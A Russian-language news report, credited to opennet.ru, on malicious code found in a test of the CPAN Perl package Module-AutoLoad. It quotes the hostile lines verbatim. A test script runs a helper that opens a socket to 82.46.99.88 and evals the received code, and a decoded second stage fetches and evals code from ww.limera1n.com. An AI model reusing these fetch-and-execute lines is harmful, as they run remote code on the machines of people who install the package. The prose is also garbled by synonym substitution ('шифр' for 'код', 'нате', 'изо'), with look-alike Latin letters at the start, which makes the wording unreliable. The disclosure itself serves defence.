В Perl-пакете Module-AutoLoad выявлен вредоносный код

В рaспрoстрaняeмoм чeрeз кaтaлoг CPAN Perl-пaкeтe Module-AutoLoad, прeднaзнaчeннoм ради aвтoмaтичeскoй зaгрузки CPAN-мoдулeй нa лeту, выявлeн врeдoнoсный кoд. Врeдoнoснaя встaвкa была найдена в коде теста 05_rcx.t, что поставляется с 2011 года. Примечательно, что такое? вопросы о загрузке сомнительного кода возникали нате Stackoverflow ещё в 2016 году. Вредоносная инициативность сводится к попытке загрузки и выполнения заключение со стороннего сервера (http://r.cx:1/) в процессе выполнения тестового набора, запускаемого близ установке модуля. Предполагается, что изначально загружаемый с внешнего сервера шифр не был вредоносным, но нонче запрос перенаправляется на домен ww.limera1n.com, дающий свою порцию кода для выполнения. К организации загрузки в файле 05_rcx.t используется нижеуказанный код: my $prog = __FILE__; $prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x; my $try = `$^X $prog`; Показанный код приводит к выполнению скрипта ../contrib/RCX.pl, содержание которого сводится к строке: use lib do{eval‹$b›&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1"}; Нынешний скрипт загружает запутанный при помощи сервиса perlobfuscator.com шифр с внешнего хоста r.cx (82.46.99.88 = "R.cX") и выполняет его в блоке eval. $ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1"; print ‹$b›;' eval unpack u=>q{_‹')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE....} В дальнейшем распаковки в итоге выполняется следующий шифр: print{$b=new IO::Socket::INET"ww.limera1n.com:80"}"GET /iJailBreak ";evalor return warn$@while$b;1 В сегодня(шний день) время проблемный пакет удалён изо хранилища PAUSE (Perl Authors Upload Server), а учётная помета автора модуля заблокирована. При этом узел пока остаётся доступен в архиве MetaCPAN и может фигурировать напрямую установлен с MetaCPAN при помощи некоторых утилит, таких что cpanminus. Отмечается, что пакет безграмотный был широко распространён. Интересно, что-нибудь к обсуждению подключился и автор модуля, тот или другой опроверг информацию о том, что вредоносный шифр подставлен после взлома его сайта "r.cx" и пояснил, точно он просто так развлекался, а perlobfuscator.com использовал маловыгодный для скрытия чего-то, а исполнение) сокращения размера кода и упрощения его копирования поверх буфер обмена. Выбор названия функции "botstrap" пояснён тем, по какой причине это слово "звучит как bot и бросьте, чем bootstrap". Автор модуля вдобавок заверил, что выявленные манипуляции далеко не совершают вредоносных действий, а лишь демонстрируют загрузку и совершение кода по TCP. Источник: http://www.opennet.ru/opennews/art.shtml?num=53448